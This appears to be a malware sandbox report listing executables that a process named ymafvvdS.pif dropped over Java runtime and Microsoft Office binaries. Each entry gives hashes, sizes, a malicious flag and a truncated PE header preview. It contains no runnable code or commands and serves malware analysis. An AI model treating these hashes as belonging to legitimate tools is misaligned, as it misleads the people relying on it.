                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                        Entropy (8bit):5.032888848595981
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:q3rjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:iXsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:4FFF31966792EDDC23CC93C3A1191E20
                                                                                                                                                                                                                        SHA1:5FFA6DDE1B61A01B6B6ECC08500ECFE3DBB6BCB6
                                                                                                                                                                                                                        SHA-256:935BF83FDE39628411EFAF4277A343BE5DD348907B4E6175F17A80BCA2C5A994
                                                                                                                                                                                                                        SHA-512:E03E7008A9E1F4C5CBBB5D2023199F8CD6E232137AECE4352E7F65E637C1C2D148C3D3C03297FB3D371E0A06FB8EC51A20E2DDE121D58F4B8F17A46F31706C68
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................l.......................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1242112
                                                                                                                                                                                                                        Entropy (8bit):5.172662146577943
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:pYdP/MXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:GdP/MsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:FEC6D29E2EA526BE7F0C118307855FA0
                                                                                                                                                                                                                        SHA1:6DD28670E88F1FEDA2EB1312E11CC81F3889BE0A
                                                                                                                                                                                                                        SHA-256:AB74DE07B2648D4EB74ECE13C1D30CAD0DA6365E22AB19571FF46E669BE0C39B
                                                                                                                                                                                                                        SHA-512:7363828A580681CB27EB40E4F003D194614C3A7D60BFD39E6E12A80892AA8D0DA4E5AEA1249B28002761E9D9E57EA6570A7BF00C969CA52E41186B5AC50ECBB6
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................P..................................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                        Entropy (8bit):5.032913117530654
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:Ry5LXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:U5sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:1EA4645047AE86082FABC2D10DA54D3A
                                                                                                                                                                                                                        SHA1:AD54B4035646728DCBB4983878D779D875C8072F
                                                                                                                                                                                                                        SHA-256:E5FE720273696BDBA8183E11C3C2501A477D4FDA122E29475B0666475389DAA7
                                                                                                                                                                                                                        SHA-512:27D7595B260E2E3733711F7A1A177B0E5884C932D49D93634F317AFBC3C973618F400E3C51D84DD531CDC43D314637A0B42F99DE21B637CF3730E031F7495B4D
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                        Entropy (8bit):5.032982479460106
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:iKlzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zdsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:3C48A532BA1A722EBA8FB0C1AA8B83A3
                                                                                                                                                                                                                        SHA1:CAA6E9FB8833349CB8ADDE482C12BA299EEC7C54
                                                                                                                                                                                                                        SHA-256:AF23E6F42B47DCB83278C4CFA7DA8506B0C77CBE49E70B97985A3CB5779F877C
                                                                                                                                                                                                                        SHA-512:E9ED81E20B4B5130C52FCB7992DBEC52375A991A3C41872738FC9485CFB812BAEFBD2BB780A2D5DF3377AB21990EA9557BA64BC8341DEF639140A73DFEDCE4B1
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................Y........................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                        Entropy (8bit):5.032983018014891
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:UilzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9dsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:E61AFD8C042A007706B30B8CFE53511D
                                                                                                                                                                                                                        SHA1:7F3583793069656985F1910D75950C0863ACA280
                                                                                                                                                                                                                        SHA-256:7EC82559637B89AC0FD26A5DBFC674052FF4CF1B9701228A01D305F7ED91B7ED
                                                                                                                                                                                                                        SHA-512:A143D41D63D0DC3EE571E140EC58879A9937356F845A9B890BD9CC294E095194EA9B356F095B7F065798CE614F79804EB07397FB56936EFD75F2D69540D19832
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................2.......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                        Entropy (8bit):5.032943815775521
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:9TmTXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:JOsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:08DFC109B332D4D9EA6879CC4CE2A843
                                                                                                                                                                                                                        SHA1:A8B1974FA687971EB11190D46B3E76B1C291DD43
                                                                                                                                                                                                                        SHA-256:50F1C56A48CCAC7910042E4A81438B44B8322CDCBAD30C0BB9ABD6D329BBB87F
                                                                                                                                                                                                                        SHA-512:798BBED3B21292B80152279C626E33A8DA541DE2B4EB508BF4FDDCCB92091D1878109D853C151EE19018DDE25731E77ABD99972D53378DF9154232E2BDBE56C8
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................N........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                        Entropy (8bit):5.033868744252427
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:Ram3Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:Q6sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:B6C409A5754AFB9FC86B353764F50856
                                                                                                                                                                                                                        SHA1:0172A73A9C7033741D8308673FDBAD9B7EFEFE6C
                                                                                                                                                                                                                        SHA-256:D4702F65856B48BD52903E0B1848AE0C3B730E36D8414C8896AFADDE17773AA0
                                                                                                                                                                                                                        SHA-512:85F26976662D177B972F54F746FBDDD805F60914CDA9B43542BD07251F3A0D3F593CB0EC7BF41A0AEEB8C1BCA378E67C3BF8060ECAC2011FA84BAEAFF28B9914
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                        Entropy (8bit):5.0329378627274455
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:2Q5LXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9RsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:0DE24A23444F47BF8B88FE4EBFF6EB56
                                                                                                                                                                                                                        SHA1:8F4CAD174F962BAB5ED226B2E0406DBA05282816
                                                                                                                                                                                                                        SHA-256:DCDC0249A07AE61CDECBBE979CC93E9842BCC2AA101FA19975810F3D5234EED7
                                                                                                                                                                                                                        SHA-512:5200FA31FFCAF55D5E8584B14923FCD7E8E14D86330549BA7F3D8300ACF188E3890F302A92C849082C63BA6F54028CFD5DF7529B74C7806824F41D7D83E41926
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................K.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                        Entropy (8bit):5.024322504835932
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:H4/OWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:Y5qYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:BD8EF50E24E7BA0B802BB329B6C1A438
                                                                                                                                                                                                                        SHA1:ED2DC2D1E2BA1B9C53F9A43A226A0E9724B2D154
                                                                                                                                                                                                                        SHA-256:14600AD51F85884F02E159FC24A1C5BE6322644A1F025458C379837C285A3C7B
                                                                                                                                                                                                                        SHA-512:B7FF6F94C588B3E8032EA0930F539B16F0BD0366CEA8410B7722296630F908026E4DD647D3811A5ADFB0FA291244219FF42869D856BEF35AE08AAC3A47144685
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................9.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                        Entropy (8bit):5.024210821674783
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:dom+WZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:mAqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:F1FCF36A1F55F97E161F21773590FF82
                                                                                                                                                                                                                        SHA1:946222D6DB3F509EBE4F1FA7D7CDDE86C3C8B497
                                                                                                                                                                                                                        SHA-256:4AEFF61E05A8E9F98A8338D0CD9E1734B584EC81EEA8C3E8C7447E8E5D30AC1C
                                                                                                                                                                                                                        SHA-512:53EA21FAFDCC972B3751AA0EC822F766E0FA3A1D48BFFF0D9FAA368DC4002A9F8ED3DD596F52E734E6CDC1B4A3DDEBEC5346F7AD01A610E469F2B4382D764B55
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                        Entropy (8bit):5.024270674429157
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:3tSWWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:dsqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:24DCF93BA4C492216B0C05693B38F5CE
                                                                                                                                                                                                                        SHA1:BAD5540DA1F1A8A804907E8F58993A5040A13534
                                                                                                                                                                                                                        SHA-256:3BC552DFAE5306954DAC95730B354866C49E9AE17D151435124FC9432D600A25
                                                                                                                                                                                                                        SHA-512:B796E8B120594A789C0EE1E54F3789DF259D36E079793362313DF1007F29CE97A6BDC3B11C93F09DE99F1E8548D74197DA32AD5D4F9110C885EDED9542751945
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................7L.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                        Entropy (8bit):5.024334243918023
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:ls/OWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:y5qYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:8DA0B9E41E7E5BF91EE408A3CD267AF2
                                                                                                                                                                                                                        SHA1:232D8BC38C70BAFEC93F916239E8AD57AC422C58
                                                                                                                                                                                                                        SHA-256:32C224101E5107BECA951E90B80667E3CD76316B293EDE0AF2E490F9F5AC202F
                                                                                                                                                                                                                        SHA-512:DC980E2A9D151073538AC365949D2111DC23C1F5C208E72C52A1689B244E8B800A129D2A90B4403753278AC98CCB1213FC81CA6E70EC43664BEBE3849C897525
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................m`.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1202688
                                                                                                                                                                                                                        Entropy (8bit):5.089522316085537
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:As8WZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:AsTqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:1BFF2EFC59E2043DA239B02DF3580F6B
                                                                                                                                                                                                                        SHA1:E77A5C6799945E784F05FEE3364C82D4D9B48876
                                                                                                                                                                                                                        SHA-256:DFC5108314439EB04EA4D9A61EE36F14347A5D6D2468105E88F91CB381C1D414
                                                                                                                                                                                                                        SHA-512:3A67180B621D19F8F6DA8F97CBA34B6CC217272C98235871627529C5E4B854337AC2009ECB952313075E7D3BA5A3D341FBFBA2733B35C23191E2752B52754F11
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@............................................................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1142784
                                                                                                                                                                                                                        Entropy (8bit):5.023660644416309
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:fNQCWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:FOqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:C5A201A95E66CE2DC2C92E1A3EEBAFE6
                                                                                                                                                                                                                        SHA1:557B39980733FD7FE076B23856299F29597E8AAC
                                                                                                                                                                                                                        SHA-256:1E9D8C351DA8C7B83DBD6061AAEA5A472554703875740456542D3A4EC6C76B2E
                                                                                                                                                                                                                        SHA-512:BBF3F1A5D496CC0D34901BE0A7EB5A3553AD8AA1521A37F1F0CB7E00425EDD926332E9CEFCEB5D9BB3E23CA77A620C36F2DD5B07AC941374237A2D1A6CB7F419
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..........................................................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...P...P...@...0..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1298944
                                                                                                                                                                                                                        Entropy (8bit):5.241045179668471
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:XCXN7D5GqS2AroAoWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:Xi7lG3roA3qYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:88DB6C800D724E4BB2B39AB4CF5BCD99
                                                                                                                                                                                                                        SHA1:287FEE95318F9CF542E87191F03EB75EB4F787A5
                                                                                                                                                                                                                        SHA-256:D64BE016C85268C38037165E9B23FB3FE37185F9A31D2F71A54E17A2BB9A7175
                                                                                                                                                                                                                        SHA-512:61E6563FD3C0BE90ABF91E46435FC78DBC63186496CC9ABF3725BE1B39FBC5A7D1617128A055117F0A709FD6DCC299ED3167EB4B5AE4F4D8A7B17243BACDA681
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................0..........................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1269248
                                                                                                                                                                                                                        Entropy (8bit):5.2783484948471715
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:H5bfQFUWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:HNfQFbqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:F0FEC544C5C145AF8E27D959E33C76DD
                                                                                                                                                                                                                        SHA1:9E426C49FB22147141288DA3381116184CA34E12
                                                                                                                                                                                                                        SHA-256:8DA454FCBBED832F396481F21CF90E04086AE9601E4491F1973462835B987664
                                                                                                                                                                                                                        SHA-512:5BABD03FFF6EBC8C62ABC1EF9B2AF5DD9410A0E2DFE6C50FB96C2342598D7F519C7F23B557AC3CDCC1E16B731084CBDD192BD56D1BB56071E8C92732F6BDFEA9
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@..................................9......................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...`...@...P..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1287680
                                                                                                                                                                                                                        Entropy (8bit):5.295155314582601
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:fNmt0LDILi2yJWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:CLikqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:E8DC9D8F1FB838925BA9070B37F6E944
                                                                                                                                                                                                                        SHA1:2C44AE14D0F0B59EC829E119E3291D539A600810
                                                                                                                                                                                                                        SHA-256:329ED32116101025EE6597ED5E995C6CF5EFA440F7BCB1B0F2894D32514A46D3
                                                                                                                                                                                                                        SHA-512:C49C392CC294B43190FDA0C470C0CF009C2E41D6D3572DE37D884BD531442436FA6D4BC749036EB27FDC05E6B18B1029F5CF010F430E591284079560ED9DE3E9
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
